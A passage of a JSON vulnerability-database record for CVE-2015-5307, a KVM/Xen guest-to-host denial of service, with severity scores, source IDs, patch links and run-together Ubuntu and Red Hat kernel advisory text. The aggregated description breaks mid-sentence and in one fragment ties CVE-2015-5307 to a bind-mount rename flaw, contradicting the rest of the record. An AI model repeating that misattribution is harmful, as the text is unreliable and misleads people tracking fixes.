            "userInteractionRequired": null,
            "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2015-5307",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "VULMON",
            "id": "CVE-2015-5307",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2015-5307"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-5307"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "The KVM subsystem in the Linux kernel through 4.2.6, and Xen 4.3.x through 4.6.x, allows guest OS users to cause a denial of service (host OS panic or hang) by triggering many #AC (aka Alignment Check) exceptions, related to svm.c and vmx.c. Linux Kernel is prone to a denial-of-service vulnerability. \nAn attacker with a guest account can exploit this issue to cause an  infinite loop in the host, denying service to legitimate users. \n\nThis update also fixes the following bugs:\n\n* When doing TSO/GSO in the presence of VLAN headers on a macvtap device,\nthe header offsets were incorrectly calculated. As a consequence, when 2\nguests on the same host communicated over a guest configured VLAN,\nperformance dropped to about 1 Mbps. (BZ#1215914)\n\n* Prior to this update, TSO acceleration features have been removed from\nthe VLAN device which caused that VLAN performance on top of a virtio\ndevice was much lower than that of a virtio device itself. This update\nre-enables TSO acceleration features, and performance of VLAN devices on\ntop of a virtio device has thus been restored. (BZ#1240988)\n\n* With an IPv6 address on a bond and a slave failover, Unsolicited Neighbor\nAdvertisement (UNA) was previously sent using the link global IPv6 address\nas source address. The underlying source code has been patched, and, after\nthe failover in bonding, UNA is sent using both the corresponding link IPv6\naddress and global IPv6 address of bond0 and bond0.vlan. (BZ#1258480)\n\n* Previously, Human Interface Device (HID) would run a report on an\nunaligned buffer, which could cause a page fault interrupt and an oops when\nthe end of the report was read. This update fixes this bug by padding the\nend of the report with extra bytes, so the reading of the report never\ncrosses a page boundary. As a result, a page fault and subsequent oops no\nlonger occur. (BZ#1268202)\n\n* Inside hugetlb, region data structures were protected by a combination of\na memory map semaphore and a single hugetlb instance mutex. However, a\npage-fault scalability improvement backported to the kernel on previous\nreleases removed the single hugetlb instance mutex and introduced a new\nmutex table, making the locking combination insufficient, leading to\npossible race windows that could cause corruption and undefined behavior. \nThe problem could be seen for example with software mapping or re-mapping\nhugetlb areas with concurrent threads reading/writing to same areas causing\npage faults. This update fixes the problem by introducing now a required\nspinlock to the region tracking functions for proper serialization. The\nproblem only affects software using huge pages through hugetlb interface. \n(BZ#1274597)\n\n* Previously, VLAN stacked on the macvlan or macvtap device did not work\nfor devices that implement and use VLAN filters. As a consequence, macvtap\npassthrough mode failed to transfer VLAN packets over the be2net driver. \nThis update implements VLAN ndo calls to the macvlan driver to pass\nappropriate VLAN tag IDs to lower devices. As a result, macvtap transfers\nVLAN packets over be2net successfully. Content-Disposition: inline\n\n==========================================================================Ubuntu Security Notice USN-2801-1\nNovember 10, 2015\n\nlinux vulnerability\n==========================================================================\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 14.04 LTS\n\nSummary:\n\nThe system could be made to crash under certain conditions. \n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.04 LTS:\n  linux-image-3.13.0-68-generic   3.13.0-68.111\n  linux-image-3.13.0-68-generic-lpae  3.13.0-68.111\n  linux-image-3.13.0-68-lowlatency  3.13.0-68.111\n  linux-image-3.13.0-68-powerpc-e500  3.13.0-68.111\n  linux-image-3.13.0-68-powerpc-e500mc  3.13.0-68.111\n  linux-image-3.13.0-68-powerpc-smp  3.13.0-68.111\n  linux-image-3.13.0-68-powerpc64-emb  3.13.0-68.111\n  linux-image-3.13.0-68-powerpc64-smp  3.13.0-68.111\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. If\nyou use linux-restricted-modules, you have to update that package as\nwell to get modules which work with the new kernel version. Unless you\nmanually uninstalled the standard kernel metapackages (e.g. linux-generic,\nlinux-server, linux-powerpc), a standard system upgrade will automatically\nperform this as well. 7.1) - ppc64, s390x, x86_64\n\n3. \n\n* A flaw was found in the way the Linux kernel\u0027s file system implementation\nhandled rename operations in which the source was inside and the\ndestination was outside of a bind mount. (CVE-2015-5307, Important)\n\n* A race condition flaw was found in the way the Linux kernel\u0027s IPC\nsubsystem initialized certain fields in an IPC object structure that were\nlater used for permission checking before inserting the object into a\nglobally visible list. A local, unprivileged user could potentially use\nthis flaw to elevate their privileges on the system. \n\nThis update also fixes the following bugs and adds one enhancement:\n\n* When setting up an ESP IPsec connection, the aes_ctr algorithm did not\nwork for ESP on a Power little endian VM host. As a consequence, a kernel\nerror was previously returned and the connection failed to be established. (BZ#1247127)\n\n* The redistribute3() function distributed entries across 3 nodes. However,\nsome entries were moved an incorrect way, breaking the ordering. As a\nresult, BUG() in the dm-btree-remove.c:shift() function occurred when\nentries were removed from the btree. (BZ#1263945)\n\n* When booting an mpt2sas adapter in a huge DDW enabled slot on Power, the\nkernel previously generated a warning followed by a call trace. \nThe provided patch set enhances the Power kernel to be able to support\nIOMMU as a fallback for the cases where the coherent mask of the device is\nnot suitable for direct DMA. As a result, neither the warning nor the call\ntrace occur in this scenario. (BZ#1267133)\n\n* If the client mounted /exports and tried to execute the \"chown -R\"\ncommand across the entire mountpoint, a warning about a circular directory\nstructure was previously returned because mount points all had the same\ninode number. (BZ#1275149)\n\n* The NFS client could previously fail to send a CLOSE operation if the\nfile was opened with O_WRONLY and the server restarted after the OPEN. \nConsequently, the server appeared in a state that could block other NFS\noperations from completing. The client\u0027s state flags have been modified to\ncatch this condition and correctly CLOSE the file. (BZ#1275298)\n\n* This update sets multicast filters for multicast packets when the\ninterface is not in promiscuous mode. This change has an impact on the RAR\nusage such that SR-IOV has some RARs reserved for its own usage as well. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n                   Red Hat Security Advisory\n\nSynopsis:          Important: kernel security and bug fix update\nAdvisory ID:       RHSA-2015:2552-01\nProduct:           Red Hat Enterprise Linux\nAdvisory URL:      https://rhn.redhat.com/errata/RHSA-2015-2552.html\nIssue date:        2015-12-08\nCVE Names:         CVE-2015-5307 CVE-2015-8104 \n=====================================================================\n\n1. Summary:\n\nUpdated kernel packages that fix two security issues, several bugs, and add\none enhancement are now available for Red Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having Important security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64\nRed Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - x86_64\n\n3. \n\n* It was found that the x86 ISA (Instruction Set Architecture) is prone to\na denial of service attack inside a virtualized environment in the form of\nan infinite loop in the microcode due to the way (sequential) delivering of\nbenign exceptions such as #AC (alignment check exception) and #DB (debug\nexception) is handled. A privileged user inside a guest could use these\nflaws to create denial of service conditions on the host kernel. \n(CVE-2015-5307, CVE-2015-8104, Important)\n\nRed Hat would like to thank Ben Serebrin of Google Inc. for reporting the\nCVE-2015-5307 issue. \n\nThis update also fixes the following bugs:\n\n* On Intel Xeon v5 platforms, the processor frequency was always tied to\nthe highest possible frequency. Switching p-states on these client\nplatforms failed. This update sets the idle frequency, busy frequency, and\nprocessor frequency values by determining the range and adjusting the\nminimal and maximal percent limit values. Now, switching p-states on the\naforementioned client platforms proceeds successfully. (BZ#1273926)\n\n* Due to a validation error of in-kernel memory-mapped I/O (MMIO) tracing,\na VM became previously unresponsive when connected to Red Hat Enterprise\nVirtualization Hypervisor. The provided patch fixes this bug by dropping\nthe check in MMIO handler, and a VM continues running as expected. \n(BZ#1275150)\n\n* Due to retry-able command errors, the NVMe driver previously leaked I/O\ndescriptors and DMA mappings. As a consequence, the kernel could become\nunresponsive during the hot-unplug operation if a driver was removed. \nThis update fixes the driver memory leak bug on command retries, and the\nkernel no longer hangs in this situation. (BZ#1279792)\n\n* The hybrid_dma_data() function was not initialized before use, which\ncaused an invalid memory access when hot-plugging a PCI card. As a\nconsequence, a kernel oops occurred. The provided patch makes sure\nhybrid_dma_data() is initialized before use, and the kernel oops no longer\noccurs in this situation. (BZ#1279793)\n\n* When running PowerPC (PPC) KVM guests and the host was experiencing a lot\nof page faults, for example because it was running low on memory, the host\nsometimes triggered an incorrect kind of interrupt in the guest: a data\nstorage exception instead of a data segment exception. This caused a kernel\npanic of the PPC KVM guest. With this update, the host kernel synthesizes a\nsegment fault if the corresponding Segment Lookaside Buffer (SLB) lookup\nfails, which prevents the kernel panic from occurring. (BZ#1281423)\n\n* The kernel accessed an incorrect area of the khugepaged process causing\nLogical Partitioning (LPAR) to become unresponsive, and an oops occurred in\nmedlp5. The backported upstream patch prevents an LPAR hang, and the oops\nno longer occurs. (BZ#1281424)\n\n* When the sctp module was loaded and a route to an association endpoint\nwas removed after receiving an Out-of-The-Blue (OOTB) chunk but before\nincrementing the \"dropped because of missing route\" SNMP statistic, a Null\nPointer Dereference kernel panic previously occurred. This update fixes the\nrace condition between OOTB response and route removal. (BZ#1281426)\n\n* The cpuscaling test of the certification test suite previously failed due\nto a rounding bug in the intel-pstate driver. This bug has been fixed and\nthe cpuscaling test now passes. (BZ#1281491)\n\nAll kernel users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. The system must be\nrebooted for this update to take effect. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1277172 - CVE-2015-5307 virt: guest to host DoS by triggering an infinite loop in microcode via #AC exception\n1278496 - CVE-2015-8104 virt: guest to host DoS by triggering an infinite loop in microcode via #DB exception\n\n6. Package List:\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nkernel-3.10.0-327.3.1.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-327.3.1.el7.noarch.rpm\nkernel-doc-3.10.0-327.3.1.el7.noarch.rpm\n\nx86_64:\nkernel-3.10.0-327.3.1.el7.x86_64.rpm\nkernel-debug-3.10.0-327.3.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-327.3.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-327.3.1.el7.x86_64.rpm\nkernel-devel-3.10.0-327.3.1.el7.x86_64.rpm\nkernel-headers-3.10.0-327.3.1.el7.x86_64.rpm\nkernel-tools-3.10.0-327.3.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-327.3.1.el7.x86_64.rpm\nperf-3.10.0-327.3.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm\npython-perf-3.10.0-327.3.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nx86_64:\nkernel-debug-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-327.3.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-327.3.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nkernel-3.10.0-327.3.1.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-327.3.1.el7.noarch.rpm\nkernel-doc-3.10.0-327.3.1.el7.noarch.rpm\n\nx86_64:\nkernel-3.10.0-327.3.1.el7.x86_64.rpm\nkernel-debug-3.10.0-327.3.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-327.3.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-327.3.1.el7.x86_64.rpm\nkernel-devel-3.10.0-327.3.1.el7.x86_64.rpm\nkernel-headers-3.10.0-327.3.1.el7.x86_64.rpm\nkernel-tools-3.10.0-327.3.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-327.3.1.el7.x86_64.rpm\nperf-3.10.0-327.3.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm\npython-perf-3.10.0-327.3.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nx86_64:\nkernel-debug-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-327.3.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-327.3.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nkernel-3.10.0-327.3.1.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-327.3.1.el7.noarch.rpm\nkernel-doc-3.10.0-327.3.1.el7.noarch.rpm\n\nppc64:\nkernel-3.10.0-327.3.1.el7.ppc64.rpm\nkernel-bootwrapper-3.10.0-327.3.1.el7.ppc64.rpm\nkernel-debug-3.10.0-327.3.1.el7.ppc64.rpm\nkernel-debug-debuginfo-3.10.0-327.3.1.el7.ppc64.rpm\nkernel-debug-devel-3.10.0-327.3.1.el7.ppc64.rpm\nkernel-debuginfo-3.10.0-327.3.1.el7.ppc64.rpm\nkernel-debuginfo-common-ppc64-3.10.0-327.3.1.el7.ppc64.rpm\nkernel-devel-3.10.0-327.3.1.el7.ppc64.rpm\nkernel-headers-3.10.0-327.3.1.el7.ppc64.rpm\nkernel-tools-3.10.0-327.3.1.el7.ppc64.rpm\nkernel-tools-debuginfo-3.10.0-327.3.1.el7.ppc64.rpm\nkernel-tools-libs-3.10.0-327.3.1.el7.ppc64.rpm\nperf-3.10.0-327.3.1.el7.ppc64.rpm\nperf-debuginfo-3.10.0-327.3.1.el7.ppc64.rpm\npython-perf-3.10.0-327.3.1.el7.ppc64.rpm\npython-perf-debuginfo-3.10.0-327.3.1.el7.ppc64.rpm\n\nppc64le:\nkernel-3.10.0-327.3.1.el7.ppc64le.rpm\nkernel-bootwrapper-3.10.0-327.3.1.el7.ppc64le.rpm\nkernel-debug-3.10.0-327.3.1.el7.ppc64le.rpm\nkernel-debug-debuginfo-3.10.0-327.3.1.el7.ppc64le.rpm\nkernel-debuginfo-3.10.0-327.3.1.el7.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-3.10.0-327.3.1.el7.ppc64le.rpm\nkernel-devel-3.10.0-327.3.1.el7.ppc64le.rpm\nkernel-headers-3.10.0-327.3.1.el7.ppc64le.rpm\nkernel-tools-3.10.0-327.3.1.el7.ppc64le.rpm\nkernel-tools-debuginfo-3.10.0-327.3.1.el7.ppc64le.rpm\nkernel-tools-libs-3.10.0-327.3.1.el7.ppc64le.rpm\nperf-3.10.0-327.3.1.el7.ppc64le.rpm\nperf-debuginfo-3.10.0-327.3.1.el7.ppc64le.rpm\npython-perf-3.10.0-327.3.1.el7.ppc64le.rpm\npython-perf-debuginfo-3.10.0-327.3.1.el7.ppc64le.rpm\n\ns390x:\nkernel-3.10.0-327.3.1.el7.s390x.rpm\nkernel-debug-3.10.0-327.3.1.el7.s390x.rpm\nkernel-debug-debuginfo-3.10.0-327.3.1.el7.s390x.rpm\nkernel-debug-devel-3.10.0-327.3.1.el7.s390x.rpm\nkernel-debuginfo-3.10.0-327.3.1.el7.s390x.rpm\nkernel-debuginfo-common-s390x-3.10.0-327.3.1.el7.s390x.rpm\nkernel-devel-3.10.0-327.3.1.el7.s390x.rpm\nkernel-headers-3.10.0-327.3.1.el7.s390x.rpm\nkernel-kdump-3.10.0-327.3.1.el7.s390x.rpm\nkernel-kdump-debuginfo-3.10.0-327.3.1.el7.s390x.rpm\nkernel-kdump-devel-3.10.0-327.3.1.el7.s390x.rpm\nperf-3.10.0-327.3.1.el7.s390x.rpm\nperf-debuginfo-3.10.0-327.3.1.el7.s390x.rpm\npython-perf-3.10.0-327.3.1.el7.s390x.rpm\npython-perf-debuginfo-3.10.0-327.3.1.el7.s390x.rpm\n\nx86_64:\nkernel-3.10.0-327.3.1.el7.x86_64.rpm\nkernel-debug-3.10.0-327.3.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-327.3.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-327.3.1.el7.x86_64.rpm\nkernel-devel-3.10.0-327.3.1.el7.x86_64.rpm\nkernel-headers-3.10.0-327.3.1.el7.x86_64.rpm\nkernel-tools-3.10.0-327.3.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-327.3.1.el7.x86_64.rpm\nperf-3.10.0-327.3.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm\npython-perf-3.10.0-327.3.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nppc64:\nkernel-debug-debuginfo-3.10.0-327.3.1.el7.ppc64.rpm\nkernel-debuginfo-3.10.0-327.3.1.el7.ppc64.rpm\nkernel-debuginfo-common-ppc64-3.10.0-327.3.1.el7.ppc64.rpm\nkernel-tools-debuginfo-3.10.0-327.3.1.el7.ppc64.rpm\nkernel-tools-libs-devel-3.10.0-327.3.1.el7.ppc64.rpm\nperf-debuginfo-3.10.0-327.3.1.el7.ppc64.rpm\npython-perf-debuginfo-3.10.0-327.3.1.el7.ppc64.rpm\n\nppc64le:\nkernel-debug-debuginfo-3.10.0-327.3.1.el7.ppc64le.rpm\nkernel-debug-devel-3.10.0-327.3.1.el7.ppc64le.rpm\nkernel-debuginfo-3.10.0-327.3.1.el7.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-3.10.0-327.3.1.el7.ppc64le.rpm\nkernel-tools-debuginfo-3.10.0-327.3.1.el7.ppc64le.rpm\nkernel-tools-libs-devel-3.10.0-327.3.1.el7.ppc64le.rpm\nperf-debuginfo-3.10.0-327.3.1.el7.ppc64le.rpm\npython-perf-debuginfo-3.10.0-327.3.1.el7.ppc64le.rpm\n\nx86_64:\nkernel-debug-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-327.3.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-327.3.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nkernel-3.10.0-327.3.1.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-327.3.1.el7.noarch.rpm\nkernel-doc-3.10.0-327.3.1.el7.noarch.rpm\n\nx86_64:\nkernel-3.10.0-327.3.1.el7.x86_64.rpm\nkernel-debug-3.10.0-327.3.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-327.3.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-327.3.1.el7.x86_64.rpm\nkernel-devel-3.10.0-327.3.1.el7.x86_64.rpm\nkernel-headers-3.10.0-327.3.1.el7.x86_64.rpm\nkernel-tools-3.10.0-327.3.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-327.3.1.el7.x86_64.rpm\nperf-3.10.0-327.3.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm\npython-perf-3.10.0-327.3.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nx86_64:\nkernel-debug-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-327.3.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-327.3.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2015-5307\nhttps://access.redhat.com/security/cve/CVE-2015-8104\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2015 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFWZubYXlSAg2UNWIIRAsvDAJ46kkXWcTnnN5EtbqyO0fc2+uZZawCeNnnr\n2T4VNHyutcGOZycd46ObXOk=\n=v6PE\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2015-5307"
      },
      {
        "db": "BID",
        "id": "77528"
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-5307"
      },
      {
        "db": "PACKETSTORM",
        "id": "135227"
      },
      {
        "db": "PACKETSTORM",
        "id": "134303"
      },
      {
        "db": "PACKETSTORM",
        "id": "134289"
      },
      {
        "db": "PACKETSTORM",
        "id": "134292"
      },
      {
        "db": "PACKETSTORM",
        "id": "134716"
      },
      {
        "db": "PACKETSTORM",
        "id": "134295"
      },
      {
        "db": "PACKETSTORM",
        "id": "134828"
      },
      {
        "db": "PACKETSTORM",
        "id": "135286"
      },
      {
        "db": "PACKETSTORM",
        "id": "134701"
      },
      {
        "db": "PACKETSTORM",
        "id": "134294"
      }
    ],
    "trust": 2.16
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2015-5307",
        "trust": 2.4
      },
      {
        "db": "BID",
        "id": "77528",
        "trust": 1.4
      },
      {
        "db": "JUNIPER",
        "id": "JSA10783",
        "trust": 1.4
      },
      {
        "db": "SECTRACK",
        "id": "1034105",
        "trust": 1.1
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2015/11/10/6",
        "trust": 1.1
      },
      {
        "db": "JUNIPER",
        "id": "JSA10770",
        "trust": 0.3
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-5307",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "135227",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "134303",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "134289",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "134292",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "134716",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "134295",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "134828",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "135286",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "134701",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "134294",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2015-5307"
      },
      {
        "db": "BID",
        "id": "77528"
      },
      {
        "db": "PACKETSTORM",
        "id": "135227"
      },
      {
        "db": "PACKETSTORM",
        "id": "134303"
      },
      {
        "db": "PACKETSTORM",
        "id": "134289"
      },
      {
        "db": "PACKETSTORM",
        "id": "134292"
      },
      {
        "db": "PACKETSTORM",
        "id": "134716"
      },
      {
        "db": "PACKETSTORM",
        "id": "134295"
      },
      {
        "db": "PACKETSTORM",
        "id": "134828"
      },
      {
        "db": "PACKETSTORM",
        "id": "135286"
      },
      {
        "db": "PACKETSTORM",
        "id": "134701"
      },
      {
        "db": "PACKETSTORM",
        "id": "134294"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-5307"
      }
    ]
  },
  "id": "VAR-201511-0294",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.55138886
  },
  "last_update_date": "2024-06-17T10:39:27.524000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "Red Hat: Important: kernel security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20160004 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20152645 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20152552 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security, bug fix, and enhancement update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20152587 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20152636 - security advisory"
      },
      {
        "title": "Ubuntu Security Notice: linux-lts-wily vulnerability",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2807-1"
      },
      {
        "title": "Ubuntu Security Notice: linux vulnerability",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2801-1"
      },
      {
        "title": "Ubuntu Security Notice: linux-lts-trusty vulnerability",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2804-1"
      },
      {
        "title": "Ubuntu Security Notice: linux-lts-vivid vulnerability",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2806-1"
      },
      {
        "title": "Ubuntu Security Notice: linux vulnerability",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2803-1"
      },
      {
        "title": "Ubuntu Security Notice: linux vulnerability",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2802-1"
      },
      {
        "title": "Ubuntu Security Notice: linux vulnerability",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2800-1"
      },
      {
